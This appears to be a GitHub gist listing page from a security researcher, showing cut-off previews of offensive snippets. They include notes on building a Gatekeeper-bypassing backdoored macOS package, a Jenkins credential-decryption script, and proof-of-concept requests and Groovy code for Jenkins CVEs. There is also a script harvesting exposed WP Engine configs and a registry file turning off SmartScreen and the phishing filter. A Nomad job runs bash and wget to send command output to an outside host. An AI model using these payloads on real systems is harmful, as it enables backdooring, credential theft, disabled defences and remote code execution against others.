Chris Gates carnal0wnage

@carnal0wnage
carnal0wnage / Backdoor Notes
Created February 28, 2019 18:45 — forked from milo2012/Backdoor Notes
Backdoor Notes
#Creating signed and customized backdoored macOS applications by abusing Apple Developer tools
https://medium.com/@adam.toscher/creating-signed-and-customized-backdoored-macos-applications-by-abusing-apple-developer-tools-b4cbf1a98187
Notes:
Include 1) 1Password 7.app (Gatekeeper approved) and 2) StuffIt Expander.app/Backdoor (not approved) in /tmp/apps. You will be allowed to run both 1) and 2) (Gatekeeper bypass).
Alternative one liner:
$ pkgbuild --root /tmp/apps --identifier com.microsoft --install-location /Applications mypackage.pkg
@carnal0wnage
carnal0wnage / decrypt.py
Created February 28, 2019 15:20
Slightly modified https://github.com/tweksteen/jenkins-decrypt/blob/master/decrypt.py because it was throwing a bytes/string error; the change is on line 55.
#!/usr/bin/env python3
import re
import sys
import base64
from hashlib import sha256
from binascii import hexlify, unhexlify
from Crypto.Cipher import AES
MAGIC = b"::::MAGIC::::"
@carnal0wnage
carnal0wnage / gist:fad7c95492224e609ddc47fb08ac8438
Created February 28, 2019 00:46
Jenkins - SECURITY-180/CVE-2015-1814 PoC
POST /user/user2/descriptorByName/jenkins.security.ApiTokenProperty/changeToken HTTP/1.1
Host: 10.0.0.160
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: https://10.0.0.160:8080/asynchPeople/
@carnal0wnage
carnal0wnage / gist:1f316c01eaa7707c3cc6497ef04857a8
Last active February 28, 2019 00:02
Jenkins - SECURITY-200 / CVE-2015-5323 PoC
//from: https://gist.github.com/hayderimran7/dec6a655ba671fa5b3c3
import jenkins.security.*
//j.jenkins.setSecurityRealm(j.createDummySecurityRealm());
User u = User.get("admin")
ApiTokenProperty t = u.getProperty(ApiTokenProperty.class)
def token = t.getApiToken()
//token.getClass()
println "token is $token "
#!/bin/bash
# If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies.
# If it "no worked" (Technical Term) then you probably need to install jq!
TARGET=$1
TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3)
# Pretty Colors
RESET='\033[00m'
GREEN='\033[01;32m'
REGEDIT4
; @ECHO OFF
; CLS
; REGEDIT.EXE /S "%~f0"
; EXIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Off"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter]
"EnabledV9"=dword:00000000
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\AppHost]
@carnal0wnage
carnal0wnage / sploit_service.hcl
Created December 18, 2018 16:22
HCL file that exploits Nomad raw_exec
job "sploit_service" {
datacenters = ["dc1"]
group "sploit" {
task "shello" {
driver = "raw_exec"
config {
command = "/bin/bash"
args = ["-c", "wget http://10.0.0.8:8000/?foo=`which nc`"]
}
@carnal0wnage
carnal0wnage / client2.hcl
Created December 18, 2018 16:08
Simple client config for Nomad
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client2"
# Give the agent a unique name. Defaults to hostname
name = "client2"
# Enable the client
@carnal0wnage
carnal0wnage / client1.hcl
Created December 18, 2018 16:07
Simple client config for Nomad
# Increase log verbosity
log_level = "DEBUG"
# Setup data dir
data_dir = "/tmp/client1"
# Give the agent a unique name. Defaults to hostname
name = "client1"
# Enable the client